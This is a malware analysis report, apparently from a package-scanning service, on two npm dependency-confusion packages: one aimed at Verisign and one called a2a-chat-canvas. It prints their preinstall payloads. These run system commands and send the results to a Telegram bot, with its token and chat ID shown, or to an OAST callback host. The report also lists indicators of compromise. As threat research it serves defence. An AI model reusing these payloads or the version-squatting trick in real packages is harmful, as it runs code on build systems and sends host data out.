Verdict:MALICIOUS — Executes code in corporate build pipelines

▸Overview

Two dependency confusion attacks. The first targets Verisign specifically, using version squatting (v99.99.11) and exfiltrating hostname/user data to a Telegram bot with message 'VERISIGN - RCE CONFIRMED'. The second targets an unknown internal package with version squatting (v97.9.9) and pings an OAST callback URL. Both self-declare as 'bug bounty' but execute code on install without consent.

2

Targets

v99

Version Squatting

Exfil Channel

Confusion

Attack Type

▸Attack Flow

Version Squatting

Both packages use extremely high version numbers (v99.99.11, v97.9.9) to win npm's version resolution over legitimate internal packages.

Preinstall Execution

Preinstall hooks run node index.js which executes id, pwd, and hostname commands to gather system info.

Data Exfiltration

Verisign attack sends results to Telegram bot 8699485977. a2a attack pings OAST callback URL for DNS-based confirmation.

▸MITRE ATT&CK Mapping

T1195.002Supply Chain Compromise — dependency confusion

T1059.007JavaScript Execution — preinstall hook

T1041Exfiltration Over C2 — Telegram bot exfiltration

T1592Gather Victim Host Information — hostname/user recon

▸Tags

Dependency ConfusionVerisignTelegramVersion SquattingBuild Pipeline

▸Full Report

Dependency Confusion Attacks: @corpweb-ui (Verisign) + a2a-chat-canvas

TL;DR

Two packages exploit dependency confusion to execute code on corporate build systems. One targets Verisign specifically and exfiltrates data via Telegram bot.

Package 1: @corpweb-ui/wmkt-library@99.99.11

Target: Verisign

Maintainer: bugbountyhunt (idea.egypt.eg@gmail.com)
Version: 99.99.11 (version squatting — high version to override internal packages)
Description: "Bug Bounty PoC for Verisign by Mohamed Elkhair"

Payload (verified from source code)

const cmd = "id && pwd && hostname";
exec(cmd, (error, stdout, stderr) => {
    const message = `🚨 *VERISIGN - RCE CONFIRMED* 🚨\n\n📦 *Target:* @corpweb-ui/wmkt-library\n\n📄 *Evidence:*\n\`\`\`\n${evidence}\n\`\`\``;
    const token = "8699485977:AAGE6u0cGKTTMuXq3TGjx05YMP8b6FibODs";
    const chatId = "1483949647";
    const url = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;
    https.get(url);
});

Comments in Arabic: "توكن البوت والـ Chat ID بتوعك" (Your bot token and Chat ID)

IOCs

Telegram bot: 8699485977
Chat ID: 1483949647
Preinstall trigger: node index.js

Package 2: a2a-chat-canvas@97.9.9

Target: Unknown internal package

Maintainer: professor-x4 (projectfrst42@gmail.com)
Version: 97.9.9 (version squatting)
Description: "Security Research PoC for Dependency Confusion"

Payload (verified from source code)

const CALLBACK_URL = 'http://dwpmxufjontejuultjhe0dcw571lqawco.oast.fun/';
function sendPing() {
    const targetUrl = `${CALLBACK_URL}?host=${encodeURIComponent(hostname)}&poc=dependency_confusion`;
    https.get(targetUrl);
}
sendPing();

IOCs

OAST callback: dwpmxufjontejuultjhe0dcw571lqawco.oast.fun
Preinstall trigger: node index.js

Note

Both self-declare as "bug bounty" / "security research" but execute code on install without consent. Regardless of intent, they run arbitrary code in corporate build pipelines and exfiltrate data to external services.